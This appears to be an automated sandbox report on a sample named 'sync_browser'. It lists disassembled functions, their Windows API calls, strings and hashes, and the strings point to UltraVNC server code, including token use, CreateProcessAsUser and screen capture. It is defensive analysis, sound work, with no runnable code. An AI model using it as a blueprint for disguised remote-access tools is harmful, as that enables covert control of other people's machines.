Instruction ID: aff41e2fe28a47d9fedd687086b5040ca68b3f5f34f1172a5df75e476eb0c05f
Opcode Fuzzy Hash: 1fcc153e8b0560ce5d91f32efa035b23564a634793fcca770c423c182836b27c
Instruction Fuzzy Hash: 70716F37A29EC285EB24CFA5E8442F96365FF64788F844436E94D87A58DF3CE159D300

Function 00007FF67E7D0E00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 153memorythreadCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF67E7D0E34
GetCurrentProcess.KERNEL32 ref: 00007FF67E7D0E4C
FindWindowA.USER32 ref: 00007FF67E7D0E62
GetWindowThreadProcessId.USER32 ref: 00007FF67E7D0E78
OpenProcess.KERNEL32 ref: 00007FF67E7D0E8E
OpenProcessToken.ADVAPI32 ref: 00007FF67E7D0EA8
GetTokenInformation.ADVAPI32 ref: 00007FF67E7D0EF6
GetLastError.KERNEL32 ref: 00007FF67E7D0F19
malloc.LIBCMT ref: 00007FF67E7D0F67

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

GetTokenInformation.ADVAPI32 ref: 00007FF67E7D0FA0
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF67E7D0FE7
EqualSid.ADVAPI32 ref: 00007FF67E7D1008
FreeSid.ADVAPI32 ref: 00007FF67E7D1028

Strings

Shell_TrayWnd, xrefs: 00007FF67E7D0E59

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
String ID: Shell_TrayWnd
API String ID: 1145045407-2988720461
Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction ID: b5e4113d46c0b25730b52471127b2ee54d365087949fae4297c84a92879f1dbd
Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction Fuzzy Hash: FA618237A287829AEB10DF31E8442A963A5FF64798F645135FA4D87B98DF3CE548C340

Function 00007FF67E7D8390 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF67E7D83CA
CreateFileA.KERNEL32 ref: 00007FF67E7D83F7
GetFileSize.KERNEL32 ref: 00007FF67E7D8462
GetFileSize.KERNEL32 ref: 00007FF67E7D8470
GetFileTime.KERNEL32 ref: 00007FF67E7D84A6
GetFileTime.KERNEL32 ref: 00007FF67E7D84C1
CompareFileTime.KERNEL32 ref: 00007FF67E7D84D7
CreateFileMappingA.KERNEL32 ref: 00007FF67E7D851E
MapViewOfFile.KERNEL32 ref: 00007FF67E7D8544
CloseHandle.KERNEL32 ref: 00007FF67E7D8550
CloseHandle.KERNEL32 ref: 00007FF67E7D8559

Strings

videodriver.cpp : Error video.dat , xrefs: 00007FF67E7D856A
c:\video0.dat, xrefs: 00007FF67E7D83B2
c:\video1.dat, xrefs: 00007FF67E7D83D9

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$CreateTime$CloseHandleSize$CompareMappingView
String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
API String ID: 286203867-3102623397
Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
Instruction ID: 7bd04220ae01eade834d59e5bd8662a435aa0cc6e9cfe7e54a18720cb2eec328
Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
Instruction Fuzzy Hash: 5A51A226A2864245FB618F29E504679B395AF94BB4F640335EA3D87BE4DE3CE44EC700

Function 00007FF67E7CD560 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128processthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD5A2
FindWindowA.USER32 ref: 00007FF67E7CD675
GetWindowThreadProcessId.USER32 ref: 00007FF67E7CD690
OpenProcess.KERNEL32 ref: 00007FF67E7CD6AB
OpenProcessToken.ADVAPI32 ref: 00007FF67E7CD6CA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF67E7CD70C
GetLastError.KERNEL32 ref: 00007FF67E7CD712
CloseHandle.KERNEL32 ref: 00007FF67E7CD71D
CloseHandle.KERNEL32 ref: 00007FF67E7CD72D
CloseHandle.KERNEL32 ref: 00007FF67E7CD73D
CloseHandle.KERNEL32 ref: 00007FF67E7CD74D

Strings

Shell_TrayWnd, xrefs: 00007FF67E7CD655
Winsta0\Default, xrefs: 00007FF67E7CD64E
-settingshelper, xrefs: 00007FF67E7CD5CF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
API String ID: 421869683-3362258117
Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction ID: 7d78f60b6724bad2ef7fee51ac6054e04e5c7ce2a53cab83cb086bf942456c5c
Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
Instruction Fuzzy Hash: 72516232B28B4195EB148F65E8442A9B7A8FB54750F444236FA9D83BA4DF3CE559C700

Function 00007FF67E7C3C70 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetClipBox.GDI32 ref: 00007FF67E7C3CC9
IsRectEmpty.USER32 ref: 00007FF67E7C3CDC
CreateCompatibleDC.GDI32 ref: 00007FF67E7C3CF5
CreateSolidBrush.GDI32 ref: 00007FF67E7C3D11
SelectObject.GDI32 ref: 00007FF67E7C3D31
PatBlt.GDI32 ref: 00007FF67E7C3D7F
SelectObject.GDI32 ref: 00007FF67E7C3D8F
StretchBlt.GDI32 ref: 00007FF67E7C3DD8
SelectObject.GDI32 ref: 00007FF67E7C3DE4
SelectObject.GDI32 ref: 00007FF67E7C3DF0
DeleteObject.GDI32 ref: 00007FF67E7C3E09
DeleteDC.GDI32 ref: 00007FF67E7C3E1A

Part of subcall function 00007FF67E7C3A90: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7C3AB6

Strings

!, xrefs: 00007FF67E7C3D72
, xrefs: 00007FF67E7C3DA3

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
String ID: $!
API String ID: 844750580-2056089098
Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
Instruction ID: 48d0bac2391fb77e6dabbb630c55d171dfa1fc6fb20d5e81412e85d37368d4d6
Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
Instruction Fuzzy Hash: D1413436B1878286EB649B16A81436AB798FFA5B94F044235ED5D87BA4DF3CE448C700

Function 00007FF67E7C6E00 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 104registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00007FF67E7C6300), ref: 00007FF67E7C6E32
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF67E7C6300), ref: 00007FF67E7C6E6B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF67E7C6300), ref: 00007FF67E7C6F9E

Part of subcall function 00007FF67E877978: malloc.LIBCMT ref: 00007FF67E877992

RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF67E7C6300), ref: 00007FF67E7C6EB7
lstrlenA.KERNEL32 ref: 00007FF67E7C6F64
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF67E7C6300), ref: 00007FF67E7C6F87

Strings

@, xrefs: 00007FF67E7C6F51
Small Business, xrefs: 00007FF67E7C6F0F
Personal, xrefs: 00007FF67E7C6F3E
Enterprise, xrefs: 00007FF67E7C6F22
ProductSuite, xrefs: 00007FF67E7C6E54, 00007FF67E7C6EA3
SBS, xrefs: 00007FF67E7C6EFC
System\CurrentControlSet\Control\ProductOptions, xrefs: 00007FF67E7C6E0F
Terminal Server, xrefs: 00007FF67E7C6EE0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$Openlstrlenmalloc
String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
API String ID: 1137168859-3840687832
Opcode ID: afa9083a294eb70c229bfb412a138fda909d98f6d2a8b21cbc9d93ad7b811590
Instruction ID: 1090c472c58ad0d78030b637cdc1ed421a55ccb722cd489f6ce31b15b734cf74
Opcode Fuzzy Hash: afa9083a294eb70c229bfb412a138fda909d98f6d2a8b21cbc9d93ad7b811590
Instruction Fuzzy Hash: 97415F33B2C64381EB108B65E58027AB7A8FFA5BD4F445131F94D86AA9DF2CE159CB00

Function 00007FF67E881630 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF67E881651
_errno.LIBCMT ref: 00007FF67E88165C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E881667
_getdrive.LIBCMT ref: 00007FF67E881671
_errno.LIBCMT ref: 00007FF67E881681
GetFullPathNameA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF67E881783,?,?,?), ref: 00007FF67E8816C8
_errno.LIBCMT ref: 00007FF67E8816E0

Strings

., xrefs: 00007FF67E8816B2
:., xrefs: 00007FF67E88169F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
String ID: .$:.
API String ID: 2522281643-2811378331
Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
Instruction ID: 07ae88902e6ff6590de0af69905fad7d07f84c3160674210a2b6d375de65180a
Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
Instruction Fuzzy Hash: CC316D23A3C28286FB61AFA594003BDA790AF61740F984035FE8DC66C7DE7CE849C751

Function 00007FF67E7D2880 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85libraryregistryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7D28CC
GetProcAddress.KERNEL32 ref: 00007FF67E7D28E9
RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00007FF67E7D2918
SetServiceStatus.ADVAPI32 ref: 00007FF67E7D2942
CreateEventA.KERNEL32 ref: 00007FF67E7D2952
SetServiceStatus.ADVAPI32 ref: 00007FF67E7D2991
GetSystemMetrics.USER32 ref: 00007FF67E7D299C
SetServiceStatus.ADVAPI32 ref: 00007FF67E7D29CD
CloseHandle.KERNEL32 ref: 00007FF67E7D29DF
SetServiceStatus.ADVAPI32 ref: 00007FF67E7D2A0B
FreeLibrary.KERNEL32 ref: 00007FF67E7D2A1A

Strings

advapi32.dll, xrefs: 00007FF67E7D28C5
uvnc_service, xrefs: 00007FF67E7D28F7
RegisterServiceCtrlHandlerExA, xrefs: 00007FF67E7D28DF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
API String ID: 333848887-3586523739
Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
Instruction ID: 758b682b6dd26cef6c782e148eaead9b4f4b3e7364e5e092b6eddbedc3dc7c30
Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
Instruction Fuzzy Hash: 3241473BA38B8291F614DF15F954275A3A4EFA9B64F60413AF85ED66A0DF7CA00DC700

Function 00007FF67E7D9C30 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF67E7D9DF1
CombineRgn.GDI32 ref: 00007FF67E7D9E0D
DeleteObject.GDI32 ref: 00007FF67E7D9E16
free.LIBCMT ref: 00007FF67E7D9E1F

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

CreateRectRgn.GDI32 ref: 00007FF67E7D9F4A
CombineRgn.GDI32 ref: 00007FF67E7D9F63
DeleteObject.GDI32 ref: 00007FF67E7D9F6C
free.LIBCMT ref: 00007FF67E7D9F75
CreateRectRgn.GDI32 ref: 00007FF67E7DA08A
CombineRgn.GDI32 ref: 00007FF67E7DA0A6
DeleteObject.GDI32 ref: 00007FF67E7DA0AF
free.LIBCMT ref: 00007FF67E7DA0B8

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

Strings

vistahook.cpp : REct %i %i %i %i , xrefs: 00007FF67E7D9D1B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
String ID: vistahook.cpp : REct %i %i %i %i
API String ID: 1305454473-3781348997
Opcode ID: bc07d1c1ea207020d1a4e4bbca126e57391e310e88d0d493861ec1b4d6ef4c5b
Instruction ID: d8e68743722c1121d977e622a83a0abc28f8b28157dd485255edf4d8af926410
Opcode Fuzzy Hash: bc07d1c1ea207020d1a4e4bbca126e57391e310e88d0d493861ec1b4d6ef4c5b
Instruction Fuzzy Hash: 1DE16877B286918EE710CF69E4846AC77E5FB58B88F504026EE4E93B58DF78D458CB00

Function 00007FF67E7F6D40 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 226threadtimeCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF67E7F6DCF
CreateThread.KERNEL32 ref: 00007FF67E7F6F11
timeGetTime.WINMM ref: 00007FF67E7F6F38
CreateRectRgn.GDI32 ref: 00007FF67E7F7052
CombineRgn.GDI32 ref: 00007FF67E7F706B
DeleteObject.GDI32 ref: 00007FF67E7F7074
free.LIBCMT ref: 00007FF67E7F707D
GetForegroundWindow.USER32 ref: 00007FF67E7F70B1
GetCursorPos.USER32 ref: 00007FF67E7F70FD
WindowFromPoint.USER32 ref: 00007FF67E7F710C
GetDesktopWindow.USER32 ref: 00007FF67E7F711F

Part of subcall function 00007FF67E877DE8: _errno.LIBCMT ref: 00007FF67E877E00
Part of subcall function 00007FF67E877DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877E0C

Strings

w8hook, xrefs: 00007FF67E7F6EC2
schook, xrefs: 00007FF67E7F6D94

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
String ID: schook$w8hook
API String ID: 2828954817-2864610768
Opcode ID: c6b6f8f58876e0042ee40eb6ce619c57b03673fcff18660bbb457870bf259618
Instruction ID: e6bce7cb7495098615f8f5f45c32a1a1a5cff99c08229441ba34fad395614c83
Opcode Fuzzy Hash: c6b6f8f58876e0042ee40eb6ce619c57b03673fcff18660bbb457870bf259618
Instruction Fuzzy Hash: 5BB16033A28B8286EB648F65E4401EA77A4FF54B84F448036EB9D87751DF7CE48AC701

Function 00007FF67E7D5EF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 171windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF67E7D5F47

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

Part of subcall function 00007FF67E7D70B0: EnumDisplaySettingsA.USER32 ref: 00007FF67E7D70F4
Part of subcall function 00007FF67E7D70B0: LoadLibraryA.KERNEL32 ref: 00007FF67E7D7109
Part of subcall function 00007FF67E7D70B0: GetProcAddress.KERNEL32 ref: 00007FF67E7D712D
Part of subcall function 00007FF67E7D70B0: FreeLibrary.KERNEL32 ref: 00007FF67E7D71F2

malloc.LIBCMT ref: 00007FF67E7D5F53
GetDC.USER32 ref: 00007FF67E7D5FBD
GetSystemPaletteEntries.GDI32 ref: 00007FF67E7D5FE7
GetLastError.KERNEL32 ref: 00007FF67E7D5FF0
DeleteDC.GDI32 ref: 00007FF67E7D6021
ReleaseDC.USER32 ref: 00007FF67E7D602E

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF67E7D5FF6
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF67E7D5F1B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF67E7D6160
